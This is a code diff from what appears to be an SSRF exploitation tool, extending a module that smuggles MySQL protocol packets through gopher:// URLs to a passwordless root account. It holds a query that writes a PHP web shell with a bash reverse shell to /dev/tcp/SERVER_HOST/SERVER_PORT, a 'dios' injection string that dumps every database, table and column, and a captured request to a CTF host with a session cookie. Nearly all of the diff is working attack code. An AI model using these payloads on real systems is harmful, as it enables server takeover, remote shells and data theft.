MySQL - Arbitratry command

core/requester.py

@@ -61,7 +61,6 @@ class Requester(object):
 
             # Handle FORM data
             else:
-                print(data)
                 for arg in data.split("&"):
                     regex = re.compile('(.*)=(.*)')
                     for name,value in regex.findall(arg):

data/request5.txt

@@ -0,0 +1,16 @@
+POST /index.php HTTP/1.1
+Host: ctf.hacklab-esgi.org:8082
+Content-Length: 5
+Cache-Control: max-age=0
+Origin: http://ctf.hacklab-esgi.org:8082
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 OPR/60.0.3255.15 (Edition beta)
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://ctf.hacklab-esgi.org:8082/
+Accept-Encoding: gzip, deflate
+Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: session=718ec500-02c9-433e-ac3d-ece753ee1169
+Connection: close
+
+url=FUZZME

modules/mysql.py

@@ -16,8 +16,11 @@ documentation = [
 ]
 
 class exploit():
-    user  = "root"
-    query = "select \"<?php system('bash -i >& /dev/tcp/SERVER_HOST/SERVER_PORT 0>&1'); ?>\" INTO OUTFILE '/var/www/html/shell.php'"
+    user    = "root"
+    query   = "SELECT database();#"
+    reverse = "select \"<?php system('bash -i >& /dev/tcp/SERVER_HOST/SERVER_PORT 0>&1'); ?>\" INTO OUTFILE '/var/www/html/shell.php'"
+    dios    = "(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#"
+
 
     def __init__(self, requester, args):
         logging.info("Module '{}' launched !".format(name))
@@ -28,14 +31,18 @@ class exploit():
         temp   = user_length - 4
         length = '{:x}'.format(0xa3 + temp)
 
+        # Authenticate to MySQL service - only work with users allowed without password
         dump  = length+ "00000185a6ff0100000001210000000000000000000000000000000000000000000000"
         dump += encode_user.decode()
         dump += "00006d7973716c5f6e61746976655f70617373776f72640066035f6f73054c696e75780c5f636c69656e745f6e616d65086c"
         dump += "69626d7973716c045f7069640532373235350f5f636c69656e745f76657273696f6e06352e372e3232095f706c6174666f726d"
         dump += "067838365f36340c70726f6772616d5f6e616d65056d7973716c"
 
-        query = input("Give query to execute (Enter for Reverse Shell): ")
-        if query == "":
+        query = input("Give MySQL query to execute (reverse/dios or any SQL statement): ")
+
+        # Reverse shell - writing system() in /var/www/html/shell.php
+        if query == "reverse":
+            self.query = self.reverse
             if args.lhost == None: 
                 self.query = self.query.replace("SERVER_HOST", input("Server Host:"))
             else:
@@ -45,9 +52,13 @@ class exploit():
                 self.query = self.query.replace("SERVER_PORT", input("Server Port:"))
             else:
                 self.query = self.query.replace("SERVER_PORT", args.lport)
+        
+        # Dump in one shot - extract every databases/tables/columns 
+        elif query == "dios":
+            self.query = self.dios
+
         else:
             self.query  = query
-        
 
         auth = dump.replace("\n","")
         gen_host = gen_ip_list("127.0.0.1", args.level)
@@ -64,7 +75,7 @@ class exploit():
 
     def encode(self, s, ip):
         a = [s[i:i + 2] for i in range(0, len(s), 2)]
-        return wrapper_gopher("%".join(a), ip, "3306")
+        return wrapper_gopher("%"+"%".join(a), ip, "3306")
 
 
     def get_payload(self, query, auth, ip):

modules/socksproxy.py

@@ -8,7 +8,7 @@ import binascii
 # NOTE
 # Due to the nature of SSRF vulnerabilities, 
 # only one response is made from a request.
-# You can get an interactive shell either..
+# You can't get an interactive shell either..
 
 # $ cat /etc/proxychains.conf 
 # [ProxyList]